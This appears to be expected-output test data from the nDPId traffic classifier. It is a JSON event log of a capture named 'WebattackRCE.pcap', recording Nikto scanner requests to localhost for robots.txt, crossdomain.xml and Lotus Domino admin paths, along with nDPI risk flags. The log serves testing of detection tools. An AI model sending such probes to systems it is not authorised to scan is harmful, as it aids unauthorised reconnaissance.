-01078{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276738,"flow_last_seen":1576420276738,"flow_idle_time":7440000,"flow_min_l4_payload_len":163,"flow_max_l4_payload_len":163,"flow_tot_l4_payload_len":163,"flow_avg_l4_payload_len":163,"midstream":1,"thread_ts_msec":1576420276738,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49644,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/clientaccesspolicy.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:clientaccesspolicy)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276739,"pkt":"AAAAAAAAAAAAAAAACABFAADJlTdAAEAGpvV\/AAABfwAAAcHuH5Dvz60WkSjxAoAYAED+vQAAAQEICp1m+yudZvsrR0VUIC9jcm9zc2RvbWFpbi54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OmNyb3NzZG9tYWluKQ0KDQo="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276739,"flow_last_seen":1576420276739,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276739,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49646,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/crossdomain.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:crossdomain)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276741,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/JMVAAEAGF3J\/AAABfwAAAcHwH5DeWhzjQtAeBoAYAED+swAAAQEICp1m+yydZvssR0VUIC9yb2JvdHMudHh0IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpyb2JvdHMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276741,"flow_last_seen":1576420276741,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276741,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49648,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP 
Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/robots.txt","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:robots)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276742,"pkt":"AAAAAAAAAAAAAAAACABFAADJFcxAAEAGJmF\/AAABfwAAAcHyH5BqYy3sS9mo74AYAED+vQAAAQEICp1m+y6dZvsuR0VUIC9kb21jZmcubnNmIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6RG9taW5vIGRldGVjdGlvbikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} 
-01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276742,"flow_last_seen":1576420276742,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276742,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49650,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/domcfg.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276743,"pkt":"AAAAAAAAAAAAAAAACABFAADIxjhAAEAGdfV\/AAABfwAAAcH0H5Bv5P4Yg+7934AYAED+vAAAAQEICp1m+y+dZvsvR0VUIC9hZG1pbi5uc2YgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OkRvbWlubyBkZXRlY3Rpb24pDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276743,"flow_last_seen":1576420276743,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276743,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49652,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276744,"pkt":"AAAAAAAAAAAAAAAACABFAADJ7atAAEAGToF\/AAABfwAAAcH2H5DjmNWMPF0CB4AYAED+vQAAAQEICp1m+zCdZvswR0VUIC9hZG1pbjQubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KDQo="} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276744,"flow_last_seen":1576420276744,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276744,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP 
Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin4.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276745,"pkt":"AAAAAAAAAAAAAAAACABFAADJnTFAAEAGnvt\/AAABfwAAAcH4H5DLFKUODsXYX4AYAED+vQAAAQEICp1m+zGdZvsxR0VUIC9hZG1pbjUubnNmIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":57,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276745,"flow_last_seen":1576420276745,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/admin5.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":217,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":217,"pkt_l4_len":183,"thread_ts_msec":1576420276747,"pkt":"AAAAAAAAAAAAAAAACABFAADL46dAAEAGWIN\/AAABfwAAAcH6H5C6Q9uIEYxnOoAYAED+vwAAAQEICp1m+zOdZvsyR0VUIC93ZWJhZG1pbi5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276747,"flow_last_seen":1576420276747,"flow_idle_time":7440000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":151,"flow_tot_l4_payload_len":151,"flow_avg_l4_payload_len":151,"midstream":1,"thread_ts_msec":1576420276747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/webadmin.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00684{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":220,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":220,"pkt_l4_len":186,"thread_ts_msec":1576420276749,"pkt":"AAAAAAAAAAAAAAAACABFAADONl9AAEAGBcl\/AAABfwAAAcH8H5Dz0w5\/kxB3k4AYAED+wgAAAQEICp1m+zWdZvs1R0VUIC9ub25leGlzdGVudC5uc2YgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpEb21pbm8gZGV0ZWN0aW9uKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276749,"flow_last_seen":1576420276749,"flow_idle_time":7440000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420276749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": 
{"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nonexistent.nsf","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:Domino detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420276751,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/ubFAAEAGgoV\/AAABfwAAAcH+H5C5FIGNENlwioAYAED+swAAAQEICp1m+zedZvs2R0VUIC8gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpwYXJrZWQgZGV0ZWN0aW9uKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
-01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276751,"flow_last_seen":1576420276751,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420276751,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:parked detection)"}} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00700{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":233,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":233,"pkt_l4_len":199,"thread_ts_msec":1576420276754,"pkt":"AAAAAAAAAAAAAAAACABFAADbnMVAAEAGn1V\/AAABfwAAAcIAH5C\/caTogsAMB4AYAED+zwAAAQEICp1m+zqdZvs5R0VUIC8gSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpvcmlnaW5fcmVmbGVjdGlvbikNCk9yaWdpbjogbmlrdG8uZXhhbXBsZS5jb20NCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":61,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276754,"flow_last_seen":1576420276754,"flow_idle_time":7440000,"flow_min_l4_payload_len":167,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":167,"flow_avg_l4_payload_len":167,"midstream":1,"thread_ts_msec":1576420276754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:origin_reflection)"}} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":62,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276756,"flow_last_seen":1576420276756,"flow_idle_time":7440000,"flow_min_l4_payload_len":162,"flow_max_l4_payload_len":162,"flow_tot_l4_payload_len":162,"flow_avg_l4_payload_len":162,"midstream":1,"thread_ts_msec":1576420276756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 